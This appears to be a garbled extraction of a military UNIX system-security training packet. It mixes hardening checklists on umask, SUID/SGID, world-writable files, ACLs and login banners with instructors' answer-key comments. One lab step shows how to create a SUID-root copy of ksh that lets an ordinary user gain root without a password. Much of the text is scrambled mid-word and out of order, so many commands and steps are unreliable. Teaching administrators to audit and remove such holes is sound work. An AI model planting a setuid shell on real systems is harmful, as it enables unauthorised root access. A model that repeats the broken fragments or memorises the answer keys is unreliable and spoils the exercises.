23. At the command prompt#, type:  rm /var/preserve/.^G
 
 
24. Is t
most administrators.   
 
_______________________________________________________________________ 

E. 
 
 

Hidden files  

 2  002 02 CTRL-B STX (Start of text) 

 4  004 04 TRL-D EOT (End of transmission) 
CTRL-E 

 6  006 06 CTRL-F ACK (Acknowledge) 

 8  010 08 CTRL-H BS (Backspace) 

 10  012 0A CTRL-J LF (Linefeed) 
 
 
Now lets find the absolute pathname to the file. 
 
22. Lets search for .\007 .  At the command prompt#, ty

 

t's delete the file so that this anomaly is no longer present on your system. 

he use of hidden non-printing characters an effective way of hiding files and directories from 

_
 

End of P

Vulnerability Countermeasure 
Unix doesn’t typically 
create files with Non-
printing characters 
unless there happens to 
be a catastrophic 
ystem

�1.  USE the ls -alb command to show hidden files and files 
with nonprintable characters  
 

#ls -abl 
NOTE:

s  crash. If you 
  ls with the –b option will display the 

nonprintable characters.  An example of non-printable 

Kelly Larsen
find / -type d -perm -001000    or find / -perm 041000    (Solaris 9 has a total of 10)

Kelly Larsen
find / -type f -perm -006000    or find / -perm 106000  (Solaris 9 has a total of 6)

gvh
UNIX PE1 EXA Q26A. The SUID bit is set on 79 files (Solaris8) 75 (Solaris9).  The SUID bit indicates that when an account executes a SUID “program” then the effective user id of the account is changed for the duration of the program.


Kelly Larsen
 yes                   chmod -s /usr/bin/admintool   (or)  chmod 555 /usr/bin/admintool

gvh
UNIX PE1 EXA Q27A.  The SGID bit is set on 23 files (Solaris8) 22 (Solaris9).  Yes, this should be a concern.  SUID should cause more concern then SGID because an account can potentially gain access to the root account.
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iscover hidden files, 
ou can bet that 

someone is attempting 

system. The operative 
question would be 
‘Why?” 
 

characters would be the sequence backspace control-
H (\^H).  In SYSV systems, ls -b shows file names 
with non-printing characters represented by their octal 

 for \^H. To determine the octal 
value of a character type: 

 
#man ascii 

BSD systems generally automatically show non-printable 
characters as "?" in the output of ls 
 

d
y

to hide files on your value, i.e. \010 is octal

 

 

gvh
UNIX PE1 EXA Q29A.  The initial permissions on the /export/home/labuser1/ksh file are –r-x r-x r-x

gvh

Page: 45� UNIX PE1 EXA Q31A.  The current permissions on the /export/home/labuser1/ksh file are –r-s r-x r-x.  The chmod command made the ksh program a SUID program.


gvh
UNIX PE1 EXA Q34A. The prompt changed from $ to #.  The effective user-id of the labuser1 account is now 0.
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UNIX PRACTICAL EXERCISES Special Notes  

n students do not do this) 
 

efore beginning the following exercises, create 2 new user accounts. (This has been done for you 

 (Fort Gordo
B
at the Fort Gordon site) 

ouse button.  At the command prompt #, type: admintool &.  On the Admintool Window, select 
nt. 

roup ID: Accept the default (you would normally change this) 
 Shell (default is Bourne) 

In the password field, select Normal Password (left on) 
er Passw

tudent1 f
t User Pa

e Dire eck the box. 
ry as /export/home/labuser1 in the Path textbox. 

o not

ccou

 

t the default (you would normally change this) 
ell (default is Bourne) 

elect Normal Password (left mouse click on button) 
nter Password textbox (left mouse click) 

 student2 for both the password and verification of the password. 
t User Password . 

 the create home directory box i
Enter the home directory as /export/home/labus
Click OK (NOTE: Do not clic
 
Select FILE>Exit to close Admintool 

re represented in Tahoma font, 
esented in Tahoma font; however, they are italicized. 

The Practical Exercise identifies the UNIX command line interface commands for each step.  
Students who understand how to use the File Manager in CDE may use those interfaces vice the 

 
Log in as root (password student).  Ensure the session is Common Desktop Environment (CDE).  

lace focus on the terminal window by moving your cursor into the window and pressing the left P
m
Edit>Add.  Use the following information to create the new  user accou
 
NAME: labuser1 
UserID:  1001 
G
Do not change the

mouse click on butt
Place focus on the Ent
Enter the password s
Press OK to close Se
Verify the Create Hom
Enter the home directo
Click APPLY (NOTE: D
 
Now create another user a

ord textbox (left mouse click) 
or both the password and verification of the password. 
ssword window. 
ctory box is checked.  If it is not checked, ch

 click Apply and OK. This is not Windows.) 

nt, labuser2. 
 
NAME: labuser2
UserID:  1002 
Group ID: Accep
Do not change the Sh
In the password field, s
Place focus on the E
Enter the password
Press OK to close Se
Verify

window
s checked.  If it is not checked, check the box. 

er2 in the Path textbox. 
k Apply and OK. This is not Windows.) 

 
General information about UNIX syntax and representations.   
UNIX command syntax must be precise. You must use spaces between commands, options, and 
(most) arguments, e.g. ls –l /usr.  Also UNIX is case-sensitive.  

or the purposes of this exercise, UNIX commands and options aF
e.g. chmod.  Files and directories are also repr
e.g. /export/home/labuser1. 

gvh
UNIX PE1 EXA Q35A.  The user-id is 1001; the effective user-id is 0; Yes this is a security issue.  Labuser1 gained root privileges without typing in a password.




PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-175 

command line steps identified (e.g. the result of the command cat /etc/default/login can also be 
obtained by placing focus on the File Manager Window and double clicking on the etc folder, the 
default folder and finally the login file).  The "   " has been placed in most of the syntax examples.  

he "    " represents a space.   T

gvh
UNIX PE1 EXA Q38A The current umask setting is 0022.  The permissions of any new file will be read/write for owner; read for group and others.


gvh
UNIX PE1 EXA Q41A.  The foobar permissions are read/write for owner; read for group and others.  No, the permissions were not set from the umask identified in the /etc/profile file.  The reason the /etc/profile settings are not utilized is because the /etc/profile settings have not been implemented.


gvh
UNIX PE1 EXA Q44A.  The permissions for foobar2 are read/write for owner and no permissions for anyone else.  Yes, the permissions were set from the umask identified in the /etc/profile file.  
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Practical Exercise SAS-7B 
XERCISE B 

ith the UNIX file & directory structure, and to reinforce 
good security practices as specified in Section 2.0 of the UNIX checklist 
 

. Log in as root (password is ‘student’).  Click on the options button (hold the mouse button in),  

et’s investigate if root login is restricted. 

ow.  (right mouse click on the desktop background, select tools, select 
terminal) 
 
3. At the # prompt type: cat /etc/default/login
 

3A. Do you have the entry ‘CONSOLE=/dev/console’?  What restriction does this put on 
the root account ? 

________________________________________________________________________ 

  

Determ
4. At the command prompt #, type: ls  –l  /etc/shells 

 requiring the use of authorized shells (does the /etc/shells file exist)?   

 
_______________________________________________________________________ 

 
_______________________________________________________________________ 

 
 
Find th

 

E
 
PURPOSE:  To give students familiarity w

1
move to session, move to common desktop environment, release the button, log in as normal. 
 
L
 
2. Access  “terminal” wind

 
_______________________________________________________________________ 

 

 
et’s verify the system is only using authorized shells.  If not, modify the system to do soL

 
ine if an /etc/shells file exists.  

4A. Is the system

e valid shells. 
5. At the command prompt #, type ls  –l  /bin/*sh (or ls –l /usr/bin/*sh) 
 

The UNIX shells you are looking for are sh, csh, ksh, and rksh (possibly remsh, bash, jsh, 
pending on vendor).   de

gvh
UNIX PE1 EXA Q46A. The current umask setting is 0077.  The umask setting in the /etc/profile is the system default setting for all users.


Kelly Larsen
yes /export/home/labuser1


gvh
UNIX PE1 EXA Q49A.  The permissions on file1 are read/write for owner; no permissions for anyone else.  Yes, the umask setting in the /etc/profile is utilized.


gvh
UNIX PE1 EXA Q51A.  The file2 permissions are read/write for owner/group and read only for other.  The permissions are different from file1.
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Create
6. We’ll use dtpad, it’s a text editor.  If you want, you can use the vi editor.  At the command 
prompt #, type: dtpad  /etc/shells  

 (you may have to type the absolute path to get the dtpad command to work.   If so, 
type: /usr/bin/dtpad /etc/shells. ) 

 new file if prompted.   
 

n separate lines:  /bin/csh, /bin/ksh, /bin/rksh, /sbin/sh. 
(example) 
/bin/csh 
/bin/ksh 

 
Select File>Save to save the file.  
Right mouse click in the title bar and select Close to close the Text Editor. 
 
6A. /bin/false and /dev/null are examples of false shells.  False shells disable login.  Should 
you add the lines: /bin/false and/or /dev/null to the /etc/shells file?    Why or why not?    

 
_______________________________________________________________________ 

 
_________________________________________________________________ 

 
7. Lets look at the account names and the shells that are assigned to them.  At the command prompt 
#, type: cut -d: -f1,7 /etc/passwd  
 (this shows the first and seventh column of the /etc/passwd file) 

7A. Which accounts have an authorized  shell now that you have created an /etc/shells file?  
What should you do to the accounts which do not have an authorized valid shell identified?   

 
_______________________________________________________________________ 

 
________________________________________________________________________ 

 
 
Let’s test to see if the /etc/shells file works. 
 
8. Log out of CDE.  CDE is the graphical desktop program we are using.  (select the Exit button in 
the Frontpanel toolbar) 
 
9. Log in as labuser1 (password is student1). During be careful to verify CDE is the selected 
Desktop.  Solaris has two.  CDE is the one we’ve been using.  Open Windows is the other. 
 

9A. Were you able to login as labuser1?  Why ?   
 

_______________________________________________________________________ 
 

________________________________________________________________________ 

 the /etc/shells file. 

Confirm the creation of the

Add the following entries o

etc. 

_______
 

gvh
UNIX PE1 EXA Q55A.  The file3 permissions are read/write for owner, group and other.  The permissions are different from file1 and file2.  The umask setting in the .profile is utilized.  No, this is not good security.
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10. Log in as root. 

later. 
11. At the command prompt #, type: dtpad  /etc/shells 
 

Add the following entry on a separate line:  /bin/sh 
 to save the file.  

Right mouse click in the title bar and select Close to close the Text Editor.   
 
Let’s determine if the system has any files that may imply the system as been 

les 

 
Add the Bourne (/bin/sh) shell to /etc/shells list so that the labuser1 account can be utilized 

Select File>Save

compromised. 
 
Orphaned fi

Vulnerability Countermeasure 
Unix doesn’t normally 
create files without an 
identifiable owner or 
group. The discovery 
of such files either 
indicates that there is a
major problem with 
your operating system, 
administrators are not 
removing user files 

hen they 

 

delete user 
ccounts, or someone is 
ttempting to hide files. 

�1.  ENSURE that all directories and files (both data and 
executable) have an id d group. 

w
a
a

entifiable owner an
 

#find / -nouser –o –nogroup     ( –print as 
required) 
 
NFS: 

#find / \ (-local –o –prune \) –nouser –o –nogroup ( –
print as required) 

 
12. Find all files and directories that do not have an identifi .  
  
 At the command prompt
 (the script matches all f

12A. What files or dire wner or group ?  If none were 
.  

__________________________ ___________________ 

_______________ ____ 

Writeable Files and Director

able owner or group (orphaned files)

 #, type: find / -nouser –o –nogroup 
ile UID and GIDs to existing accounts) 
ctories do not have an identifiable o

found, state so
 

___________ _______________
 

_______
 
 

______________________________________________

ies  
Vulnerability Countermeasure 

World-writeable files 
and directories are 
normally set as a matter 

�1.  EN  unnecessarySURE that there are no  or unexpected 
wo w m.   

NO  
rld- riteable files or directories on your syste

TE:  it is necessary for some (maybe most) /dev files

Kelly Larsen
Assign the user a restrictive shell and ensure the user is properly trained.

Kelly Larsen
The umask setting would have to be:  033
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of convenience; 
owever, attackers will 

tion 

to b
 

#find / -type f –perm –g+w  (-print as required) 
#find / -type f –perm –o+w (-print as required) 

Cou
pag
 
To 
in a
#chmod -R go-w /directoryname , 

�2.  ENSURE that you don’t have ANY system writeable 
directories, i.e. /etc, /bin, /usr, /dev, /export, /sbin 
�3.  ENSURE that writeable directories are not also readable. 
Directories that are both writeable and readable may be used 
in an unauthorized manner.  
 
Note: There are also implications in having writeable 
directories in user's home directories 

#ls -l 
#chmod -R g-w directoryname 

�4.  ENSURE that any writeable directories are owned by 
root and have permissions 1733. 
The sticky bit should be set. If the directory has the sticky bit 

set, a file can be deleted only by the owner of the file, the 
owner of the directory or by root. 

h
not overlook the 
obvious.  
Reconfiguration of 
system files, such as 
those located in 
/etc/rc*.d, could give 
attackers root access.  
Especially important 
are system initializa
files, system 
configuration files, or 
user startup files. 

e world-writeable. 

#find / -type d –perm –g+w (-print as required) 
#find / -type d -perm –o+w (-print as required) 
 

ld be added to a cronjob to routinely check. See manual 
e on crontab 

remove Group and Other write permissions from all files 
 particular directory, use the following command: 

 (for instance /etc, /bin
etc.) 

 

 
 
As an administrator, you should be concerned about the unrestrictive permissions that are set 
by default in a typical UNIX system.  The permission that will cause the greatest security 
problem is the Write permission.  You need to know which files and directories have the 
Write permission set for Group, but in particular for Other.  Let’s determine the files that 
have write permissions set for group, other or both.   
 
13. We’ll search all the type -,b,c,p files for other’s write permission and then stick the results into 
a file called wfiles.   At the command prompt #, type: 
find  /  \( -type  f  –o   –type  b  -o  –type  c  -o  -type  p  \) -perm –o+w > wfiles 
 
*note:  when you direct output to a file, it no longer displays on the screen. 
 
14. This script searches the same file list for group write permission and appends the file.  At the 
command prompt #, type: 
find  /  \( -type  f  –o   –type  b  -o  –type  c  -o  -type  p  \) -perm –g+w >> wfiles 
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ries for group write permission and sends the results to a file 

called wdirs.  At the command prompt #, type:  find / -type d  –perm  –g+w > wdirs 

 

s 

ow let’s look and see what our command did for us.  The 1  2 commands created a file 
he files that have either Write permissions for group or 

nd 2 commands irs) that contain a list of 
hat had ei  for other. 

ompt #, 

 the contents o

______________ __ 

ber of lin  i

prompt #, type: wc  -l  wfiles (the result of this command provides the 
umber of lines) 

18A. How many files have the ‘Write’ permission set for Group or Other ?    Do the default 

  

15.  This script checks all directo

16. This script appends the previous list with all the directory names that have others write 
permission.  At the command prompt #, type:  find / -type d –perm –o+w >> wdir

 
stN

(wfiles) that contains a list of all t
Write permissions for other.  The 2  created a file (wd
all the directorie
 
17. At the command pr
 

17A. What is
 
________

 
 
Let’s count the num
 
18. At the command 

s t ther Write permissions for group or Write permissions

type: cat  wfiles 

f the file wfiles?  Are the file names listed one per line ?   

____________________________________________

es n the wfiles file. 

n
 

file permissions leave potential holes in the system ? 
 
           

9. At the command prompt #, type: cat  wdirs 

19A. What is the contents of the file wdirs?  
 

            

wdirs file. 
 
20. At the command prompt #, type: wc  -l  wdirs 

?    Do the 

 
 

 
1
 

  

 
Let’s count the number of lines in the 

 
20A. How many directories have the ‘Write’ permission set for Group or Other
default directory permissions leave potential holes in the system ? 

 
_____________________________________________________________________________ 

Kelly Larsen
rw-r--r-- (022)  or  rw------- (077)

Kelly Larsen
yes
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In your reading assignment, you learned about the “Set User Id – SUID” and “Set Group Id – 
SGID”.  Let’s see if your system has either of these set on files.  We’ll search the computer by 
searching for the permission octal values 

1.  At the command prompt #, type: find /  -type f  -perm -004000 >  suidfiles 
 
22. At the command prompt #, type: find / -type f -perm -002000 >  sgidfiles 
 
  22A.  Write the proper syntax that will find all of the directories with the "sticky bit" set 
 
 __________________________________________________________________________ 
 

 the proper syntax that will find all of the files that have both the SUID and 
SGID bits set. 
 
 __________________________________________________________________________ 
 
Let’s count the number of lines in the suidfiles file  

 

23. At the command prompt #, type: wc  -l  suidfiles 
 

23A. How many files have the SUID?  What security implication does the SUID bit 
indicate?___________________________________________________________ 

 
__________________________________________________________________________ 
 

 
2

 22B.  Write

23B.  Check the output of step 21.  Does the file "/usr/bin/admintool" exist on the list?  
Write the proper syntax using the  "chmod"  command that will turn off the SUID bit in 
/usr/bin/admintool. 

 
__________________________________________________________________________ 
 
__________________________________________________________________________ 

 
 
Let’s count the number of lines in the sgidfiles file. 

 

24. At the command prompt #, type: wc  -l sgidfiles 
 

24A. How many files have the SGID?  Is this a concern?  Which should cause you the most 
concern, SUID or SGID? 

 
              
 
              
 

Kelly Larsen
labuser2 (rw)

Kelly Larsen
yes --------t

Kelly Larsen
yes
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e vulnerability associated with

rompt #,  /export/home/labuser1  
py of the ko  y. 

mpt #,

e curr

 
Let’s investigate th  SUID. 

 

25. At the command p
This makes a co

 
26. At the command pro
 

26A. What are th

 

 

type: cp  /usr/bin/ksh
rn shell and puts it into the /export/home/labuser1 director

 –l  /export/home/labuser1/ksh type: ls  

ent permissions? 

 
_________________
 
27. At the command prom
 
28. At the command

 

____________________________________________________________ 

pt #, type: chmod  4555  /export/home/labuser1/ksh 

 prompt #,  type: ls –l /export/home/labuser1/ksh 

at are the current permissions?  How did the chmod command change the 28A. Now wh
program? 

 
 
__________________
 
 
29. At the command pr
 
30. Log in as la

 

___________________________________________________________ 

ompt #, type: telnet  localhost 

buser1. 

1. At the command prompt $, type: /export/home/labuser1/ksh 
 

31A. What happened? What does this mean? 
 
 

3

 
_____________________________________________________________________________ 
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32. At the command prompt #, type: id 
 

32A. What is your user id?  What is your effective user id?  Could this be a security issue? 
 
 
 
_____________________________________________________________________________ 
 
 
33. At the command prompt #, type: exit to quit the korn shell session. 
34. At the command prompt $, type: exit to quit the telnet session. 
 
 
SUID/SGID   

Vulnerability Countermeasure 
Processes that have a 
SUID or SGID will 
execute as either the 
owner of the file or the 
group that is assigned 
to the file. Files that are 
executed as root are 
particularly dangerous.   
NOTE:  Buffer 
overflows, race 
conditions, and 
symlink attacks 
(mentioned in other 
parts of this checklist) 
would be virtually 
useless unless the 
program were SUID 
root. 

�1.  REMOVE the set-user-id (SUID) or set-group-id 
(SGID) bit from processes that do not need it.  Most systems 
ship with more preset suid files than are required.  Many of 
these programs are only accessed by root.   
 
�2.  Disable XHOST and CHROOT applications and any 
other application or process that uses a SETUID to Root upon 
execution, on all servers. 
 

NOTE 1: This is the point of failure on all standard 
UNIX machines. Virtually every attack is based around 
the concept of gaining root access on a machine. Once 
this is achieved an intruder can literally do anything with 
your system.  

SUID 
#find / -type f  -perm -4000 -ls (-print as required) 
SGID 
#find / -type f  -perm -2000 -ls (-print as required) 
 

Could be added to a cronjob to routinely check. See manual 
page on crontab. 

 
 
As a System Administrator, you are concerned about security and want to make permissions 
more restrictive.  In your reading assignment, you learned about the “UMASK”.  Let’s see 
how the UMASK affects the creation of files and directories. 
 
35. At the command prompt #, type: umask 
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35A. What is your current umask setting?  How does this setting affect the permissions of 
newly created files?   

 
 
 
_____________________________________________________________________________ 
 
 
 
Let’s set a system default umask.. 
36. At the command prompt #, type: dtpad  /etc/profile 
 

  Change  the umask entry to 077. 
Select File>Save to save the file.  
Close the Text Editor Window by placing the cursor on the title bar; pressing the right 
mouse button and selecting Close 

 
37. At the command prompt #, type: touch  foobar 
38. At the command prompt #, type:: ls –l  foobar 

38A. What are the permissions?  Do they match the umask in the /etc/profile? Why  ? 
 
 
 
_____________________________________________________________________________ 
 
 
39. Log out of CDE.  Log back in as root. 

0. At the command prompt #, type: touch  foobar2 
41. At the comm ls  –l  foobar2
 

the perm  to create 
issions

 
4

and prompt #, type::  

41A. What are 
these perm

 
 

issions?  Was the umask setting in the /etc/profile used
?  

 
____________________
 

_____ _________________________ 

2. Log out of CDE, then log back in as labuser1.  NOTE: Be careful to verify CDE is the selected 
esktop. 

43. A  prompt $, type: umask 

___________________________

 
4
D
 
 

t the command
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is your curr setting in 
ile? 

43A. What 
the /etc/profile f

 
 

ent umask setting?   What does indicate about the umask 

 
44. At the command prompt $, type: p

labuser1's hom

____________________ ___ 

 file1. 

t
prompt $, type: ls

ssions oes th e umask setting in the /etc/profile file 
et the fi permissions? 

______________________________________________________________ 

user1

wd 
 

44A. Are you in 
 
___________
 
 
 
Create a file called
 
45. At the command prompt $, type: 
46. At the command 
 

46A. What permi
utilized to s

 
 
__________________
 
 
Change lab

e directory? 

___________________________________________

ouch  file1 
 –l  file1 

 d
le 

e file have? Was th

 umask so that all files you create have the following permissions: 

owner = read, write 
rite 

 
47. At the command prompt $, mask  002 
48. At the command prompt $, type:  touch file2 

 
48A. What are the permissions?  Are they different from file1? 
 
            

 

group = read, w
other = read 

 type:  u

 
 

Let’s set the labuser1 umask so that labuser1 always get the permissions labuser1 wants on 
login vice the system defaults (e.g. labuser1 won’t have to type the umask command every  
time labuser1 logs in).  labus s labuser1 
creates. 
 

9. At the command prompt $, type:  dtpad  .profile 
 

er1 wants everyone to be able to read and write the file

4
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Editing the .profile allows you to change your operating environment.  Create a new line 
and add: 

 
 umask  000 
 

Select File>Save to save the file. 
Close the dtpad Window by placing the cursor on the title bar; pressing the right mouse 
button and selecting Close 

 
0. Log out of CDE, log back in as labuser1. 

 the labuser1 umask has changed 

 

mpt $,
ompt $,

the permissions?  Are they different from file1? file2?  Which umask 
file) is being utilized ?  Is this good security ? 

____________________________________________________________ 

____________________________________________________________ 

5
 
 Let’s verify

51. At the command pro
52. At the command pr

 
52A. What are 
(/etc/profile, .pro
 
_____________

  
______________

 type: touch  file3 
 type: ls  –l file3 
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 to stop a user from creating a .profile umask setting? 

 
 __________________________________________________________________________ 
 

53C.  What would the umask setting in the ~/.profile need to be to create a resulting 

____ 

 52B.  What could you do

directory permission of: 
owner = read, write, execute 
group = read 
other = read 
______________________________________________________________________
 

 
NOTE: When changing the default umask for root, be careful of the final result. 
 
54. End of PE. 
 
Umasks for Users 

Vulnerability Countermeasure 
Users can set their own 

mask.  This will 
�1.  ENSURE that the umask value fo
037 (consider a more restrictive value, sU

override system 

Hacker
advantage of files that 

settings.   
 
 

r each user is set to 
uch as 077). 

Check .  (for sh, ksh) or .login (for csh) for setting 
 universally grant other permissions. 

 
The first way to set the system Umask is to Edit the 

 by modifying the umask line to 
read umask 037 or 077.  
The second and more popular option is to edit the file 

tc/profile by modifying the umask line to read 
umask 037 or 077. 

.profile/.login/.cshrc. 

defaults for the user.  
profile

umask value. Don’t
s can take 

have weak permission file /etc/default/login

/e

 
NOTE: The /etc/default/login and /etc/profile files are used 
for every user.  Which file is used depends on the version of 
UNIX.  Also, umask settings will be superseded/overridden 
by a user’s 

 
UMASKS for Root 

Vulnerability Countermeasure 
Default Umask values 
may not be set 
ppropriately to protect a

files created by root. 

�1.  ENSURE that the umask value for root is set to 077 
Check .profile (for sh, ksh) or .login (for csh) for setting 
umask value. Don’t universally grant other permissions. 
 To set a umask value for root which is different than 

the umask value for all users, you must create a 

• If the system Umask is set to 077 in the 
/etc/default/login or /etc/profile, root will not need a 

•

.profile, .cshrc, or .login for root and place it in 
root's home directory. 

Kelly Larsen
you should

Kelly Larsen
you should
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separate entry in a .profile/.login/.cshrc. 
 

ace conditions R
Vulnerability Countermeasure 

Attackers will take 
 

r process while it is 

e 
ttack to abuse the 

program after it enters 
a privileged mode but 
before it gives up its 
privileges. A 

ulnerability that 

�1.  REMOVE the SUID bit from as many files as possible 
and apply all relevant vendor-related security patches. 

NOTE 1: As with symlinks, there is no sure-fire cure to 
ers to 

ls in a 
secure manner. 
NOTE 2:  A good practice for reducing this vulnerability 
is to reduce the number of SUID/SGID binaries on the 
system. 

 

advantage of a program
o
performing a privileged 
operation.  This usually 

this vulnerability. The best defense is for programm
ensure that the programs they create run trap signa

involves timing th
a

v
allows attackers to 
abuse this window of 

pportunity is called a o
“race condition.” 
 
 

Kelly Larsen
you should see that the action is directed to the rmmount command
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ractical Exercise SAS-7C 
EXERCISE C 

 
 

he purpose of this PE is to get you acquainted with file access control lists.  Commands to type 
are written in bold.  Only type what is in bold.  The ‸ symbol indicates where you put in a space.   
 
File Access Control List  

P

T

Vulnerability Countermeasure 
ACLs allow the 
administrator to set 
finer controls than are 
allowed by the default 
Unix permissions.  
Failure to set ACLs on 
critical files and 
directories may 
potentially leave those 
files and directories 
exploitable by 
malicious attackers. 
 

�1.  USE FACLs (access control lists) if your version of 
UNIX supports it. 

NOTE:  Using chmod on a file that has an FACL set, 
both the file group and owner permissions, and the FACL 
mask are changed to the new permissions. The new 
FACL mask permissions may change the effective 
permissions for additional users and groups who have 
FACL entries on the file. 

• If a file or directory has an FACL set, a '+' will appear as 
the last character (far right) following the permissions. 

• FACL are only supported by the UFS and are best used to 
control access to binaries which have the suid or sgid bit 
set. 

 
 
1.  Locate your current directory.  Make sure it is the root directory ( / ).  Type: #  pwd 
 
2.  Create a file to assign an access control list to.  Type:  # touch‸myfile 
 
3.  Check the file for assigned permissions.  Type:  #  ls‸-l‸myfile 
 
 a.  What are the permissions?  ____________________________________ 
 
4.  Remove all permissions to the file.  Type:  # chmod‸000‸myfile 
 
5.  Verify the new permissions.  Type:  # ls‸-l‸myfile 
 
6.  Are the new permissions set to no access for owner, group, and other?  ___________ 
 
7.  Set up your access control list so that labuser2 has read/write privilege on the file. 
 
 a.  Type:  # setfacl‸-m‸user:labuser2:rw-‸myfile 
 
8.  Verify the new access control list.  Type:  # getfacl‸myfile 

Kelly Larsen
It is in the last line of the rmmount.conf file

Kelly Larsen
udfs, hsfs, ufs
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 a.  Who has access to this file?  ________________________________________ 

.  Verify that the file is reporting the access control list by checking permissions.   

ave the permissions changed from step 3? ____________________________ 
 

l list?  
____________________ 

10.  End of PE…. 

 

 
9
 

a.  Type:  # ls‸-l‸myfile 
 
b.  H

c.  Has a plus sign appeared at the end of the permissions to indicate an access contro
_________________________________________
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Banners 

Vulnerability Countermeasure 
Sec
ban
tha
mo
ban
give
tha
hac
rep
sho
bot

urity warning 
ners notify users 
t they may be 
nitored.  Lack of a 
ner may potentially 

e impression  th
t this system may be 
ked without 
ercussion.  A banner 

 

uld be provided for 
h the desktop 

(GUI) login and the 
command 
line/network login.  
Ind
also
ind
ser
 
A b
the
sys
the 
mo
use 
agr
bein nd 

lations 
overning the 
onitoring or use of 
e system. 

 See AR 380-53 and 
R 380-5 

ommand line login banner

ividual banners may 
 be set up for 

ividual network 
vices. 

anner should tell 
 visitor who the 
tem belongs to, that 

tem is being sys
nitored, that their 

he system is of t
eement to their 
g monitored, a

the regu
g
m
th
 
*
A

�1.  vi /etc/issue  (create a c  

  which bypass the GUI) 
o 

g the Dtlogin login screen, modify the 
 file.  Set the 
g to the Attention Banner.   

N! 

OD COMPUTER 
ESSING 

RMATION, 

TION LEVEL OF 
 

BOVE THE 
ACCREDITATION LEVEL OF 
THIS SYSTEM. THIS COMPUTER 
SYSTEM, INCLUDING ALL 
RELATED EQUIPMENT, 
NETWORKS, AND NETWORK 
DEVICES (INCLUDES INTERNET 
ACCESS) ARE PROVIDED ONLY 
FOR AUTHORIZED U.S. 
GOVERNMENT USE. DOD 
COMPUTER SYSTEMS MAY BE 
MONITORED FOR ALL LAWFUL 

for connections 
                           

• The /etc/default/telnetd and /etc/default/ftpd may als
be used for the corresponding network service. 

�2.  For systems usin
/usr/dt/config/Xresources
Dtlogin*greeting.labelStrin
 
“ATTENTIO

THIS IS A D
SYSTEM. BEFORE PROC
CLASSIFIED INFO
CHECK THE SECURITY 
ACCREDITA
THIS SYSTEM. DO NOT
PROCESS, STORE, OR 
TRANSMIT INFORMATION 
CLASSIFIED A
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PURPOSES, INCLUDING TO 
NSURE THEIR USE IS 

ORIZED, FOR 
MANAGEMENT OF THE 
SYSTEM, TO FACILITATE 
PROTECTION AGAINST 
UNAUTHORIZED ACCESS, AND 
TO VERIFY SECURITY 
PROCEDURES, 
SURVIVABILITY, AND 
OPERATIONAL SECURITY, 
MONITORING INCLUDES, BUT 
IS NOT LIMITED TO, ACTIVE 
ATTACKS BY AUTHORIZED 
DOD ENTITIES TO TEST OR 
VERIFY THE SECURITY OF 
THIS SYSTEM. DURING 
MONITORING, INFORMATION 
MAY BE EXAMINED, 
RECORDED, COPIED, AND 
USED FOR AUTHORIZED 
PURPOSES. ALL INFORMATION, 
INCLUDING PERSONAL 
INFORMATION, PLACED ON OR 
SENT OVER THIS SYSTEM MAY 
BE MONITORED. USE OF THIS 
DOD COMPUTER SYSTEM, 
AUTHORIZED OR 

E
AUTH

Kelly Larsen
(3-1)
Used to execute commands on other computers without having to login to them.


Kelly Larsen
(3-2)
(invalid username) "login is incorrect"
(invalid password) "password is incorrect"


Kelly Larsen
(3-3)
1) rlogin(d) does not require that the user type his or her name.
2) If the connection comes from a trusted host or user, the receiving computer lets the user login without typing a password.


Kelly Larsen
(3-4)
If one host trusts another host, than any user who has the same username on both hosts can log in from the trusted host to the other computer without typing a password.


Kelly Larsen
(3-5)
If you designate a user on another computer as a trusted user for your account, then that user can log into your account without typing a password.


Kelly Larsen
(3-6)
You can't always trust a host and you can't trust the users on that host.


Kelly Larsen
(3-7)
/etc/hosts.equiv


Kelly Larsen
(3-8)
~/.rhosts
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UNAUTHORIZED, 
CONSTITUTES CONSENT TO 
MONITORING. UNAUTHORIZED 
USE OF THIS DOD COMPUTER 
SYSTEM MAY SUBJECT YOU 
TO CRIMINAL PROSECUTION. 
EVIDENCE OF UNAUTHORIZED 
USE COLLECTED DURING 
MONITORING MAY BE USED 
FOR ADMINISTRATIVE, 
CRIMINAL, OR OTHER 
ADVERSE ACTION. USE OF 
THIS SYSTEM CONSTITUTES 
CONSENT TO MONITORING 
FOR ALL LAWFUL PURPOSES” 
 
 

 
Message of the Day, & Mount Tab 

Vulnerability Countermeasure 
False information can 

e released to system 

the Day (MOTD) goes 
out to all users on the 

stem.  Do not use the 

banners. 
 

�1.  ENSURE that the permissions of /etc/motd and 
/etc/mtab are set to 644 or more restrictive. 
 

#ls –l /etc/motd  
#ls –l /etc/mtab 
#chmod 644 /etc/motd  

#chmod 644 /etc/mtab 

b
users.  The Message of 

sy
motd file for login 

 
 
Core dump files 

Vulnerability Countermeasure 
Core files are generally 
world-readable and 
their memory often 

�1.  CONSIDER disabling the creation of core dump files. 
Core images are created when a process abnormally 
terminates.  The ulimit command can be used to place limits 

Kelly Larsen
(3-9)
HTTP, HTTPS, sftp, scp


Kelly Larsen
(3-10)
over 50 commands


Kelly Larsen
(3-11)
In passive ftp the client initiates the connection to the server.  In active, the server initiates the connection to the client (this is the normal method)


Kelly Larsen
(3-12)
Utilizing active mode, an attack can be made to look like it came from the ftp server instead of the attacker.  It also allows for attacking network computers that are accessible to the ftp server but not to the attacker.


Kelly Larsen
(3-13)
1) User can't change directory
2) User can't change the value of the path environment variable
3) User can't use command names using slashes "/"
4) User can't redirect output with ">" or ">>"


Kelly Larsen
(3-14)
Secure terminals  and  the wheel group


Kelly Larsen
(3-15)
edit the  /etc/default/login  and add  CONSOLE=/dev/console


Kelly Larsen
(3-16)
NO
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contains sensitive 
information, including 

is 

 the 
rocess's working 

directory (Note: this is 
critical. Each 
terminated process, 
such as telnet or ftp, 
can create separate core 
images).  coreadm is 
the command used to 
specify the name and 
location of core files 
produced by 
abnormally-terminated 
processes. 
 

on the user.  You can limit the user's core file size, data 
segment size, maximum amount of CPU time, maximum 

en files, and more. 

To prevent the creation of co

c 0 
gin, .cshrc, or .profile.   

 daemons from creating core files, 
entry 
c 0 
ppropriate boot script (usually in /etc/rc*.d) 

NY

password hashes 
deriv

number of op
 ed from the 

/etc/shadow file. 
 
The operating system 
writes out a core image 
of a process when it 
ungracefully 
terminated.  The core 
image is called core 
nd is written ina

p

re files by users, add the 
entry 
ulimit -
to their .lo
 
To prevent system
add the 

 -ulimit
ato the 

 
To prevent A  process from creating a core dump, 

 0 
tc/system file.  This may not work on i386 
 of Unix. 

add the entry 
